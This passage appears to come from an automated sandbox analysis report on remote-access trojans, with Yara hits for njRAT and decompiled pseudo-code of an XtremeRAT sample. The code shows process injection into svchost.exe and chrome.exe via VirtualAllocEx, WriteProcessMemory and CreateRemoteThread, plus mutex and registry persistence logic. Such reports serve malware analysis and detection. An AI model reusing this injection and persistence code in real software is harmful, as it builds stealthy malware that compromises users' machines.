                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:43:41
                Start date:30/09/2021
                Path:C:\Users\user\AppData\Local\Temp\System.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Local\Temp\System.exe' ..
                Imagebase:0xd50000
                File size:29696 bytes
                MD5 hash:B207157C9F171556BF4D240C14AABA0E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                Reputation:low

                General

                Start time:16:43:50
                Start date:30/09/2021
                Path:C:\Users\user\AppData\Local\Temp\System.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Local\Temp\System.exe' ..
                Imagebase:0x3e0000
                File size:29696 bytes
                MD5 hash:B207157C9F171556BF4D240C14AABA0E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                Reputation:low

                General

                Start time:16:43:58
                Start date:30/09/2021
                Path:C:\Users\user\AppData\Local\Temp\System.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Local\Temp\System.exe' ..
                Imagebase:0x240000
                File size:29696 bytes
                MD5 hash:B207157C9F171556BF4D240C14AABA0E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
                Reputation:low

                Disassembly

                Code Analysis


                  Executed Functions

                  C-Code - Quality: 77%
                  			E100098A8(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
                  				long _v20;
                  				long _v24;
                  				intOrPtr _v28;
                  				void* _v32;
                  				_Unknown_base(*)()* _v36;
                  				void* _t18;
                  				void* _t20;
                  				void* _t30;
                  				struct HINSTANCE__* _t32;
                  				void* _t35;
                  				long _t36;
                  				void* _t37;
                  
                  				_v32 = __ecx;
                  				_v36 = __edx;
                  				_t30 = __eax;
                  				_v28 = 0;
                  				_t32 = GetModuleHandleA(0);
                  				_push(0);
                  				_push(_t32);
                  				asm("cdq");
                  				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
                  				asm("adc edx, [esp+0x4]");
                  				_t36 =  *(_t18 + 0x50);
                  				_t35 =  *(_t18 + 0x34);
                  				VirtualFreeEx(_t30, _t35, 0, 0x8000); // executed
                  				_t20 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40); // executed
                  				_t37 = _t20;
                  				if(_t37 != 0) {
                  					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24); // executed
                  					if(_t36 <= _v24) {
                  						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20); // executed
                  						CloseHandle(_t30);
                  						_v32 = _t37;
                  					}
                  				}
                  				return _v28;
                  			}


                  APIs
                  • GetModuleHandleA.KERNEL32(00000000), ref: 100098C0
                  • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 100098EA
                  • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 100098F9
                  • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 1000990C
                  • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 10009914
                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 10009935
                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 1000993B
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                  • String ID:
                  • API String ID: 2398686212-0
                  • Opcode ID: c8b9f5ed8a23e53db09e119bfd08287f0d6aeb9eed48f96718b2bf67d83e23c7
                  • Instruction ID: 56678c190a81291c74d5659315aa0a406f5499a7e455af1083e81e7bb303a9db
                  • Opcode Fuzzy Hash: c8b9f5ed8a23e53db09e119bfd08287f0d6aeb9eed48f96718b2bf67d83e23c7
                  • Instruction Fuzzy Hash: 161130B52443417FE350DA69CC82F2B77ECEBC4790F01882CB648D7292DA70F814876A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E10005CA4(WCHAR* __eax) {
                  				void* _t2;
                  				void* _t5;
                  				struct _WIN32_FIND_DATAW* _t6;
                  
                  				_t5 = 0;
                  				_t2 = FindFirstFileW(__eax, _t6); // executed
                  				if(_t2 != 0xffffffff) {
                  					_t5 = 1;
                  				}
                  				FindClose(_t2);
                  				return _t5;
                  			}


                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CAF
                  • FindClose.KERNEL32(00000000,00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CBC
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID:
                  • API String ID: 2295610775-0
                  • Opcode ID: 330f1bf4dbc552c91da48253f5c4906a029c88ec3c8321f42aab6186b9465800
                  • Instruction ID: 7a3a1ab874b80ece1c9db2ee4d12350f52d059cd31b038f16b98c78c9643ece9
                  • Opcode Fuzzy Hash: 330f1bf4dbc552c91da48253f5c4906a029c88ec3c8321f42aab6186b9465800
                  • Instruction Fuzzy Hash: CBC01295941A0016B90055B45CCB897210DD7411B5F150731BA25863D4DB1E581A10A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				void _v5040;
                  				char _v5044;
                  				char _v5048;
                  				void _v5572;
                  				char _v5576;
                  				char _v5580;
                  				char _v5584;
                  				char _v5588;
                  				char _v5592;
                  				char _v5596;
                  				char _v5600;
                  				char _v5604;
                  				char* _t62;
                  				intOrPtr _t79;
                  				intOrPtr _t82;
                  				intOrPtr _t88;
                  				intOrPtr _t119;
                  				void* _t122;
                  				void* _t124;
                  				int* _t152;
                  				int* _t156;
                  				void* _t170;
                  				intOrPtr _t174;
                  				intOrPtr _t177;
                  				intOrPtr _t194;
                  				intOrPtr _t197;
                  				intOrPtr _t203;
                  				intOrPtr _t210;
                  				intOrPtr _t216;
                  				intOrPtr _t219;
                  				intOrPtr _t225;
                  				intOrPtr _t240;
                  				WCHAR* _t244;
                  				void* _t245;
                  				void* _t246;
                  				void* _t247;
                  				intOrPtr _t301;
                  				intOrPtr _t305;
                  				void* _t336;
                  				void* _t340;
                  				void* _t349;
                  				intOrPtr _t354;
                  				intOrPtr _t355;
                  				void* _t357;
                  				void* _t368;
                  
                  				_t243 = __ebx;
                  				_t354 = _t355;
                  				_t247 = 0x2bc;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t247 = _t247 - 1;
                  				} while (_t247 != 0);
                  				_push(__ebx);
                  				E10004CE4(E1000D030);
                  				_push(_t354);
                  				_push(0x1000d759);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t355;
                  				E10003024(0x1000d0d0);
                  				_t62 =  *0x1000e134; // 0x1000e020
                  				 *_t62 = 1;
                  				SetErrorMode(0x8007); // executed
                  				E10005954(1,  &_v24);
                  				E10003A34(_v24, L"restart");
                  				if(0 == 0) {
                  					E10005954(0,  &_v28);
                  					E100037AC(0x10012580, _v28);
                  					_t240 =  *0x10012580; // 0x781fa4
                  					ShellExecuteW(0, L"open", E1000390C(_t240), 0, 0, 0);
                  					ExitProcess(0);
                  				}
                  				E10005954(1,  &_v32);
                  				E10003A34(_v32, L"update");
                  				if(0 == 0) {
                  					Sleep(0x1770);
                  				}
                  				E100050D8();
                  				E100051E8(0,  &_v5040);
                  				memcpy(0x1000f834,  &_v5040, 0x4e4 << 2);
                  				_t336 = 0x1000f834;
                  				E10003BE4(0x10012580, 0x9c8);
                  				_t79 =  *0x10012580; // 0x781fa4
                  				E100050D0(E1000390C(_t79), _t336);
                  				_t82 =  *0x10012580; // 0x781fa4, executed
                  				E10006234(_t82, _t243,  &_v5044, L"CONFIG",  &_v5040, 0); // executed
                  				E100037AC(0x10012580, _v5044);
                  				E100050D8();
                  				_t88 =  *0x10012580; // 0x781fa4
                  				E100050D0(_t336, E1000390C(_t88));
                  				_t348 = _t336;
                  				memcpy("e", _t336, 0x4e4 << 2);
                  				_t357 = _t355 + 0x18;
                  				_t340 = _t336;
                  				E100037AC(0x100432d4, L"SOFTWARE\\XtremeRAT");
                  				SHDeleteKeyW(0x80000001, E1000390C( *0x100432d4)); // executed
                  				_t13 = _t340 + 0xfaa; // 0x100107de
                  				E100038E0(0x100432d4, 0x3d, _t13);
                  				E1000577C(0x80000001, _t243, L"Mutex", L"SOFTWARE\\XtremeRAT", _t336, 0, 2,  *0x100432d4); // executed
                  				E10005664( &_v5572);
                  				E100038E0( &_v5048, 0x105,  &_v5572);
                  				E10003928( &_v5048, 0x105, L"\\Microsoft\\Windows\\", 0);
                  				if(E10005690(E1000390C(_v5048)) != 1) {
                  					E10005664( &_v5572);
                  					E100038E0( &_v5584, 0x105,  &_v5572);
                  					_push(_v5584);
                  					_push( *0x1000e0f8);
                  					_t31 = _t340 + 0xfaa; // 0x100107de
                  					_t259 = 0x3d;
                  					E100038E0( &_v5588, 0x3d, _t31);
                  					_push(_v5588);
                  					_push(L".cfg");
                  					E100039EC();
                  				} else {
                  					E10005664( &_v5572);
                  					E100038E0( &_v5576, 0x105,  &_v5572);
                  					_push(_v5576);
                  					_push(L"\\Microsoft\\Windows\\");
                  					_t24 = _t340 + 0xfaa; // 0x100107de
                  					_t259 = 0x3d;
                  					E100038E0( &_v5580, 0x3d, _t24);
                  					_push(_v5580);
                  					_push(L".cfg");
                  					E100039EC();
                  				}
                  				_t119 =  *0x10012584; // 0x77139c
                  				_t244 = E1000390C(_t119);
                  				_t122 = E10005CA4(_t244);
                  				_t363 = _t122;
                  				if(_t122 != 0) {
                  					SetFileAttributesW(_t244, 0x80);
                  					 *0x100432cc = E1000CF04(_t244, 0x10012588);
                  					 *0x100432d0 = 0x10012588;
                  					_t210 =  *0x10012584; // 0x77139c
                  					E10005F1C(_t210, _t244, _t259, _t348);
                  					E10003BE4(0x10012580, E10003FD4( *0x100432cc,  *0x100432d0, 2, 0));
                  					_t216 =  *0x10012580; // 0x781fa4
                  					E100050D0(E1000390C(_t216), 0x10012588);
                  					_t219 =  *0x10012580; // 0x781fa4
                  					E10006234(_t219, _t244,  &_v5592, L"CONFIG", _t348, _t363);
                  					E100037AC(0x10012580, _v5592);
                  					E100050D8();
                  					_t225 =  *0x10012580; // 0x781fa4
                  					E100050D0(_t340, E1000390C(_t225));
                  				}
                  				if( *((intOrPtr*)(_t340 + 0x1388)) != 0x1e240) {
                  					SetFileAttributesW(_t244, 0x80);
                  					DeleteFileW(_t244);
                  					E100050D8();
                  					E100051E8(0,  &_v5040);
                  					memcpy(_t340,  &_v5040, 0x4e4 << 2);
                  					_t357 = _t357 + 0xc;
                  					_t340 = _t340;
                  					E10003BE4(0x10012580, 0x9c8);
                  					_t194 =  *0x10012580; // 0x781fa4
                  					E100050D0(E1000390C(_t194), _t340);
                  					_t197 =  *0x10012580; // 0x781fa4
                  					E10006234(_t197, _t244,  &_v5596, L"CONFIG",  &_v5040, 0);
                  					E100037AC(0x10012580, _v5596);
                  					E100050D8();
                  					_t203 =  *0x10012580; // 0x781fa4
                  					E100050D0(_t340, E1000390C(_t203));
                  				}
                  				_t41 = _t340 + 0xfaa; // 0x100107de
                  				_t124 = E10004DF0(0, 0, _t41); // executed
                  				_t245 = _t124;
                  				if(GetLastError() == 0xb7) {
                  					ExitProcess(0);
                  				}
                  				CloseHandle(_t245);
                  				if( *((char*)(_t340 + 0xfa8)) == 1) {
                  					_t43 = _t340 + 0x109e; // 0x100108d2
                  					_t170 = E10004DF0(0, 0, _t43); // executed
                  					_t245 = _t170;
                  					_t368 = GetLastError() - 0xb7;
                  					if(_t368 == 0) {
                  						CloseHandle(_t245);
                  					} else {
                  						CloseHandle(_t245);
                  						_t174 =  *0x1000e0f4; // 0x0
                  						_push(E1000391C(_t174) + _t175);
                  						_t177 =  *0x1000e0f4; // 0x0
                  						E100050D0(L"svchost.exe", E1000390C(_t177));
                  						E100098A8(E10009950(L"svchost.exe"), _t340, E1000C9D0);
                  					}
                  				}
                  				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\7FW4ce2RDy.exe", 0x20a);
                  				_t45 = _t340 + 0xbd2; // 0x10010406
                  				E100038E0( &_v5600, 0x3d, _t45);
                  				_t301 =  *0x1000e0f0; // 0x0
                  				E10003A34(_v5600, _t301);
                  				if(_t368 != 0) {
                  					_t48 = _t340 + 0xbd2; // 0x10010406
                  					E100038E0( &_v5604, 0x3d, _t48);
                  					_t303 =  *0x1000e0ec; // 0x0
                  					E10003A34(_v5604, _t303);
                  					if(__eflags != 0) {
                  						_t53 = _t340 + 0xbd2; // 0x10010406
                  						_t303 = _t53;
                  						E100050D0(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", _t53);
                  						_t349 = E10009950(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe");
                  					} else {
                  						E100054C4( &_v5572, __eflags);
                  						memcpy(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",  &_v5572, 0x82 << 2);
                  						asm("movsw");
                  						_t340 = _t340;
                  						_t349 = E10009950(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe");
                  					}
                  				} else {
                  					_t349 = 0;
                  				}
                  				 *0x10012370 = 0;
                  				if(_t349 != 0) {
                  					while(1) {
                  						_t304 = E1000C080;
                  						_t246 = E100098A8(_t349, L"C:\\Users\\hardz\\Desktop\\7FW4ce2RDy.exe", E1000C080);
                  						__eflags = _t246;
                  						if(_t246 == 0) {
                  							_t156 =  *0x1000e0fc; // 0x1000e000
                  							TerminateProcess(_t349,  *_t156);
                  							_t349 = E10009950(L"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe");
                  							Sleep(0x1f4);
                  						}
                  						 *0x10012370 =  *0x10012370 + 1;
                  						__eflags = _t246;
                  						if(_t246 != 0) {
                  							break;
                  						}
                  						__eflags =  *0x10012370 - 7;
                  						if( *0x10012370 < 7) {
                  							continue;
                  						}
                  						break;
                  					}
                  					E1000B78C(_t340, _t246, _t304, _t340, _t349); // executed
                  					__eflags = _t246;
                  					if(_t246 == 0) {
                  						_t152 =  *0x1000e0fc; // 0x1000e000
                  						TerminateProcess(_t349,  *_t152);
                  						E1000C080(_t246, _t340, _t349, L"C:\\Users\\hardz\\Desktop\\7FW4ce2RDy.exe");
                  					}
                  					goto L32;
                  				} else {
                  					E1000B78C(_t340, _t245, _t303, _t340, _t349);
                  					E1000C080(_t245, _t340, _t349, L"C:\\Users\\hardz\\Desktop\\7FW4ce2RDy.exe");
                  					L32:
                  					_pop(_t305);
                  					 *[fs:eax] = _t305;
                  					_push(0x1000d760);
                  					E10003788( &_v5604, 8);
                  					E10003788( &_v5048, 2);
                  					return E10003788( &_v32, 3);
                  				}
                  			}

                  APIs
                  • SetErrorMode.KERNEL32(00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 1000D13A
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 1000D18A
                  • ExitProcess.KERNEL32(00000000,00000000,open,00000000,00000000,00000000,00000000,00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 1000D191
                  • Sleep.KERNEL32(00001770,00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 1000D1B7
                  • SHDeleteKeyW.SHLWAPI(80000001,00000000,00008007,00000000,1000D759,?,?,?,?,00000000,00000000), ref: 1000D281
                    • Part of subcall function 1000577C: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
                    • Part of subcall function 1000577C: RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
                    • Part of subcall function 1000577C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD
                    • Part of subcall function 10005690: lstrlenW.KERNEL32(00000000,1000F834,1000F834,?,1000D2F8,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 100056B7
                  • SetFileAttributesW.KERNEL32(00000000,00000080,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 1000D3D8
                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 1000D499
                  • DeleteFileW.KERNEL32(00000000,00000000,00000080), ref: 1000D49F
                    • Part of subcall function 10004DF0: CreateMutexW.KERNEL32(?,?,?,?,1000D54A,00000000,00000000,HgDdsuTd), ref: 10004E06
                  • GetLastError.KERNEL32(00000000,00000000,HgDdsuTd), ref: 1000D54C
                  • ExitProcess.KERNEL32(00000000,00000000,00000000,HgDdsuTd), ref: 1000D55A
                  • CloseHandle.KERNEL32(00000000,00000000,00000000,HgDdsuTd), ref: 1000D560
                  • GetLastError.KERNEL32(00000000,00000000,HgDdsuTdPERSIST,00000000,00000000,00000000,HgDdsuTd), ref: 1000D580
                  • CloseHandle.KERNEL32(00000000,00000000,00000000,HgDdsuTdPERSIST,00000000,00000000,00000000,HgDdsuTd), ref: 1000D58D
                  • CloseHandle.KERNEL32(00000000,00000000,00000000,HgDdsuTdPERSIST,00000000,00000000,00000000,HgDdsuTd), ref: 1000D5D3
                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 1000D5E4
                  • TerminateProcess.KERNEL32(00000000,00000000,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 1000D6CD
                  • Sleep.KERNEL32(000001F4,00000000,00000000,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 1000D6E3
                  • TerminateProcess.KERNEL32(00000000,00000000,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 1000D70F
                    • Part of subcall function 100054C4: GetTempPathW.KERNEL32(00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000,00000000,00000000,HgDdsuTd), ref: 100054D4
                    • Part of subcall function 100054C4: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A,00000000), ref: 10005515
                    • Part of subcall function 100054C4: CloseHandle.KERNEL32(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 1000551B
                    • Part of subcall function 100054C4: FindExecutableW.SHELL32(?,00000000,?), ref: 10005528
                    • Part of subcall function 100054C4: DeleteFileW.KERNEL32(?,00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,00000104,?,1000F834,00000000,1000D64A,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000552E
                    • Part of subcall function 10009950: CreateProcessW.KERNEL32 ref: 1000999D
                    • Part of subcall function 10009950: Sleep.KERNEL32(00000064,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,1000F834,1000F834,00000000,1000D68D,00000000), ref: 100099AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$CloseProcess$CreateHandle$DeleteErrorSleep$AttributesExitLastTerminate$ExecutableExecuteFindModeModuleMutexNamePathShellTempValuelstrlen
                  • String ID: .cfg$C:\Program Files\Google\Chrome\Application\chrome.exe$C:\Users\user\Desktop\7FW4ce2RDy.exe$CONFIG$HgDdsuTd$HgDdsuTdPERSIST$Mutex$SOFTWARE\XtremeRAT$\Microsoft\Windows\$open$restart$svchost.exe$update
                  • API String ID: 17641713-1360669444
                  • Opcode ID: 098e3562cc71e91e86165adcb7c231f29123dbc9123391b6d7212fe8bb235743
                  • Instruction ID: 7babdffad351a71ae314de662e95e98ead1dbb94228c143735747afee298a140
                  • Opcode Fuzzy Hash: 098e3562cc71e91e86165adcb7c231f29123dbc9123391b6d7212fe8bb235743
                  • Instruction Fuzzy Hash: E2E1B5787005559BF715E764CC82B9FB3AAEB803C0F508061F5489B29EEEB5FE418B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 44%
                  			E1000B78C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v1018;
                  				void _v5028;
                  				char _v5580;
                  				char _v5584;
                  				char _v5588;
                  				char _v5592;
                  				char _v5596;
                  				char _v5600;
                  				char _v5604;
                  				char _v5608;
                  				char _v5612;
                  				char _v5616;
                  				char _v5620;
                  				char _v5624;
                  				char _v5628;
                  				char _v5632;
                  				char _v5636;
                  				char _v5640;
                  				char _v5644;
                  				char _v5648;
                  				char _v5652;
                  				char _v5656;
                  				char _v5660;
                  				char _v5664;
                  				char _v5668;
                  				char _v5672;
                  				char _v5676;
                  				char _v5680;
                  				char _t138;
                  				char _t143;
                  				void* _t150;
                  				char _t158;
                  				char* _t233;
                  				void* _t234;
                  				void* _t248;
                  				void* _t250;
                  				void* _t252;
                  				void* _t254;
                  				void* _t258;
                  				void* _t262;
                  				intOrPtr _t267;
                  				intOrPtr _t284;
                  				void* _t285;
                  				short* _t314;
                  				short* _t316;
                  				void* _t318;
                  				void* _t319;
                  
                  				_t318 = _t319;
                  				_t234 = 0x2c5;
                  				goto L1;
                  				L4:
                  				E10003A34(_v8, 0);
                  				if(0 == 0) {
                  					L29:
                  					_pop(_t267);
                  					 *[fs:eax] = _t267;
                  					_push(E1000BC64);
                  					E10003788( &_v5680, 0xf);
                  					E100032F0( &_v5620, 2);
                  					E10003788( &_v5612, 2);
                  					E100032F0( &_v5604, 2);
                  					E10003788( &_v5596, 4);
                  					return E10003788( &_v16, 3);
                  				} else {
                  					while(1) {
                  						E10003A34(_v8, 0);
                  						if(0 == 0) {
                  							goto L29;
                  						}
                  						E10003770( &_v16);
                  						E10003770( &_v12);
                  						E100050D8();
                  						E100050D0(_t233, E1000390C(_v8));
                  						E10003B04( &_v8, 0x228, 1, __eflags);
                  						E10003AB8(_v8, E10003FD4( *((intOrPtr*)(_t233 + 0x210)),  *((intOrPtr*)(_t233 + 0x214)), 2, 0), 1, __eflags,  &_v16);
                  						E10003B04( &_v8, E10003FD4( *((intOrPtr*)(_t233 + 0x210)),  *((intOrPtr*)(_t233 + 0x214)), 2, 0), 1, __eflags);
                  						__eflags =  *((char*)(_t233 + 0x220));
                  						if( *((char*)(_t233 + 0x220)) != 0) {
                  							L9:
                  							_t138 =  *((intOrPtr*)(_t233 + 0x218));
                  							__eflags = _t138;
                  							if(_t138 != 0) {
                  								__eflags = _t138 - 1;
                  								if(_t138 != 1) {
                  									__eflags = _t138 - 2;
                  									if(_t138 != 2) {
                  										__eflags = _t138 - 3;
                  										if(_t138 != 3) {
                  											__eflags = _t138 - 4;
                  											if(__eflags == 0) {
                  												E10005638( &_v5656, _t314, _t316);
                  												__eflags = 0;
                  												E10003A34(_v5656, 0);
                  												if(__eflags != 0) {
                  													E10005638( &_v5660, _t314, _t316);
                  													_push(_v5660);
                  													_push(E1000BCA4);
                  													E100038E0( &_v5664, 0x105, _t233);
                  													_push(_v5664);
                  													E100039EC();
                  												}
                  											}
                  										} else {
                  											E100038E0( &_v5648, 0x105, _t233);
                  											_push(_v5648);
                  											E10005324( &_v5652);
                  											_pop(_t248);
                  											E10003988( &_v12, _t248, _v5652, __eflags);
                  										}
                  									} else {
                  										E100038E0( &_v5640, 0x105, _t233);
                  										_push(_v5640);
                  										E10005460( &_v5644, _t233, 0x105, __eflags);
                  										_pop(_t250);
                  										E10003988( &_v12, _t250, _v5644, __eflags);
                  									}
                  								} else {
                  									E100038E0( &_v5632, 0x105, _t233);
                  									_push(_v5632);
                  									E100053D8( &_v5636, _t233, __eflags);
                  									_pop(_t252);
                  									E10003988( &_v12, _t252, _v5636, __eflags);
                  								}
                  							} else {
                  								E100038E0( &_v5624, 0x105, _t233);
                  								_push(_v5624);
                  								E10005350( &_v5628, _t233, __eflags);
                  								_pop(_t254);
                  								E10003988( &_v12, _t254, _v5628, __eflags);
                  							}
                  							E10003988( &_v5668, L".exe", _v12, __eflags);
                  							_t143 = E10005EB4(E1000390C(_v5668), L"OK", 4, 0); // executed
                  							__eflags = _t143;
                  							if(__eflags != 0) {
                  								_t284 = _v12;
                  								E10003988( &_v5680, L".xtr", _t284, __eflags);
                  								DeleteFileW(E1000390C(_v5680)); // executed
                  							} else {
